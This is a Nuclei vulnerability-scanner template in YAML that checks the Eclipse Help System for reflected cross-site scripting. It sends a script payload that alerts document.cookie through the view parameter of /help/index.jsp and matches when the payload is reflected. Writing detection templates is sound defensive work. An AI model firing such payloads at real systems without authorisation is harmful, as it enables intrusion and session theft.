nuclei-templates/vulnerabilities/ibm/eclipse-help-system-xss.yaml

25 lines
543 B
YAML

id: eclipse-help-system-xss
info:
name: Eclipse Help System RXSS vulnerability
author: pikpikcu
severity: medium
tags: ibm,xss
requests:
- method: GET
path:
- "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: word
words:
- "text/html"
part: header